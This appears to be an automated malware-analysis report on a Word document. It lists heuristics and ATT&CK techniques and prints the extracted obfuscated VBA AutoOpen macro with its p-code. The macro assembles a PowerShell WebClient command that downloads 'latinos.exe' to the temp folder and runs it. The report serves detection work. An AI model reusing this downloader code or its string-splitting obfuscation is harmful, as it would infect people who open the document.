Verdict: MALICIOUS (risk score 130)

MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File

Malware Insights
The sample contains a VBA macro with an AutoOpen function that uses CreateObject to execute a command. This command downloads a file named 'latinos.exe' to the temporary directory and then executes it. The macro also attempts to establish persistence by writing to the Run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'. The embedded URLs appear to be benign schema references.
Heuristics (6)

- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script:
  EIjfiHEUUU = OIEJiEIHFUOO Set pOIJiJIHuuEUUf = CreateObject( _ "" + kiiiHEHu + "p" + isdhsut.ibhuhug + "h" + KfjjIIhei + "")
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script:
  Attribute VB_Customizable = True Sub AutoOpen() ghUEuGUufGUe = ELfOEJ + peOIEJijf
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All three URLs below were found in document text (OLE body):
  - http://schemas.openxmlformats.org/drawingml/2006/main
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5515 bytes |

SHA-256: 65b8622fa131accfdfddb51fe16b84545be519e359868f93695ea3720b42cbf1

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "iJHuhuuEE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
ghUEuGUufGUe = ELfOEJ + peOIEJijf
kiiiHEHu = isdhsut.viishdh
OEjjiEIiieI = pEofOEjfiEOO + IEhufUEh + eoJFieue
KfjjIIhei = "ell"
EIjfiHEUUU = OIEJiEIHFUOO
Set pOIJiJIHuuEUUf = CreateObject( _
"" + kiiiHEHu + "p" + isdhsut.ibhuhug + "h" + KfjjIIhei + "")
pOIJiJIHuuEUUf.Run ovsJIjgijIR(), 0
End Sub
Function ovsJIjgijIR()
kOJjiiI = "(nE"
oidiHIhguv = kOJjiiI + idhuru.obsjie + "ECT ('" + idhuru.isjgkr + "'+'N'+'et.WebCli'+'en'+'t'))"
oijdiHhhf = "mch.co"
gsjdidj = "'" + mvdoir.odjiwr + "sa" + oijdiHhhf + "m" + mvdoir.idurh + "cr '"
kpJKejf = ".('Do"
pKookvoOjvo = kpJKejf + "wn'+'load'+'" + isdhsut.Caption + "').Invoke(" + gsjdidj + ","
pKOjibhuidj = "'%TMP%\latinos.exe')"
UggfgEY = "PRoC"
OfkOjIejiHE = isdhsut.jixjiihd + "Rt-" + UggfgEY + "e`sS '%TMP%\latinos.exe';"
oJofjiJE = idhuru.isdihs + "S" + idhuru.Caption + ""
JIhHUUfggF = oJofjiJE & oidiHIhguv
JHghuhuGGU = pKookvoOjvo + pKOjibhuidj + OfkOjIejiHE
uhuGEyfgyGE = JIhHUUfggF & JHghuhuGGU
udgge = "c"
jIheuGtyye = udgge + isdhsut.ibhdur
ovsJIjgijIR = jIheuGtyye + " /c " + uhuGEyfgyGE + " "
End Function
Attribute VB_Name = "JFihUEHfw"
Attribute VB_Name = "mvdoir"
Attribute VB_Base = "0{E3F8DB7F-3197-4DD9-A84D-7D2B1A70428F}{5DED60BB-E0D1-4D17-B074-1D4E08647AD1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "isdhsut"
Attribute VB_Base = "0{0130C5FF-2D1C-4B94-8B47-3B40D6E8636B}{4D60EEB9-C498-46B7-8388-43B7D3A166CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "idhuru"
Attribute VB_Base = "0{1443E596-BF91-4AD3-8D8A-CF4B90316189}{1E5F2541-2F16-42BF-AE4B-092C8DEF2D9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Processing file: /opt/analyzer/scan_staging/82e92a3a01594ded88e53707f97826fa.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iJHuhuuEE - 3280 bytes
' Line #0:
' FuncDefn (Sub kiiiHEHu())
' Line #1:
' Ld viishdh
' Ld OEjjiEIiieI
' Add
' St isdhsut
' Line #2:
' Ld IEhufUEh
' MemLd eoJFieue
' St pEofOEjfiEOO
' Line #3:
' Ld EIjfiHEUUU
' Ld OIEJiEIHFUOO
' Add
' Ld pOIJiJIHuuEUUf
' Add
' St KfjjIIhei
' Line #4:
' LitStr 0x0003 "ell"
' St CreateObject
' Line #5:
' Ld Run
' St ibhuhug
' Line #6:
' LineCont 0x0004 05 00 00 00
' SetStmt
' LitStr 0x0000 ""
' Ld pEofOEjfiEOO
' Add
' LitStr 0x0001 "p"
' Add
' Ld IEhufUEh
' MemLd oidiHIhguv
' Add
' LitStr 0x0001 "h"
' Add
' Ld CreateObject
' Add
' LitStr 0x0000 ""
' Add
' ArgsLd kOJjiiI 0x0001
' Set ovsJIjgijIR
' Line #7:
' ArgsLd obsjie 0x0000
' LitDI2 0x0000
' Ld ovsJIjgijIR
' ArgsMemCall idhuru 0x0002
' Line #8:
' EndSub
' Line #9:
' FuncDefn (Function obsjie(id_FFFE As Variant))
' Line #10:
' LitStr 0x0003 "(nE"
' St isjgkr
' Line #11:
' Ld isjgkr
' Ld kpJKejf
' MemLd pKookvoOjvo
' Add
' LitStr 0x0006 "ECT ('"
' Add
' Ld kpJKejf
' MemLd Caption
' Add
' LitStr 0x001C "'+'N'+'et.WebCli'+'en'+'t'))"
' Add
' St gsjdidj
' Line #12:
' LitStr 0x0006 "mch.co"
' St TextBox3
' Line #13:
' LitStr 0x0001 "'"
' Ld _B_var_ghUEuGUufGUe
' MemLd id_02BE
' Add
' LitStr 0x0002 "sa"
' Add
' Ld TextBox3
' Add
' LitStr 0x0001 "m"
' Add
' Ld _B_var_ghUEuGUufGUe
' MemLd id_02C0
' Add
' LitStr 0x0004 "cr '"
' Add
' St pKOjibhuidj
' Line #14:
' LitStr 0x0005 ".('Do"
' St UggfgEY
' Line #15:
' Ld UggfgEY
' LitStr 0x000C "wn'+'load'+'"
' Add
' Ld IEhufUEh
' MemLd jixjiihd
' Add
' LitStr 0x000A "').Invoke("
' Add
' Ld pKOjibhuidj
' Add
' LitStr 0x0001 ","
' Add
' St OfkOjIejiHE
' Line #16:
' LitStr 0x0014 "'%TMP%\latinos.exe')"
' St oJofjiJE
' Line #17:
' LitStr 0x0004 "PRoC"
' St isdihs
' Line #18:
' Ld IEhufUEh
' MemLd JHghuhuGGU
' LitStr 0x0003 "Rt-"
' Add
' Ld isdihs
' Add
' LitStr 0x0019 "e`sS '%TMP%\latinos.exe';"
' Add
' St JIhHUUfggF
' Line #19:
' Ld kpJKejf
' MemLd udgge
' LitStr 0x0001 "S"
' Add
' Ld kpJKejf
' MemLd jixjiihd
' Add
' LitStr 0x0000 ""
' Add
' St uhuGEyfgyGE
' Line #20:
' Ld uhuGEyfgyGE
' Ld gsjdidj
' Concat
' St jIheuGtyye
' Line #21:
' Ld OfkOjIejiHE
' Ld oJofjiJE
' Add
' Ld JIhHUUfggF
' Add
' St ibhdur
' Line #22:
' Ld jIheuGtyye
' Ld ibhdur
' Concat
' St JFihUEHfw
' Line #23:
' LitStr 0x0001 "c"
' St mvdoir
' Line #24:
' Ld mvdoir
' Ld IEhufUEh
' MemLd _B_var_ELfOEJ
' Add
' St Document
' Line #25:
' Ld Document
' LitStr 0x0004 " /c "
' Add
' Ld JFihUEHfw
' Add
' LitStr 0x0001 " "
' Add
' St obsjie
' Line #26:
' EndFunc
' Macros/VBA/JFihUEHfw - 686 bytes
' Macros/VBA/mvdoir - 1316 bytes
' Macros/VBA/isdhsut - 1317 bytes
' Macros/VBA/idhuru - 1317 bytes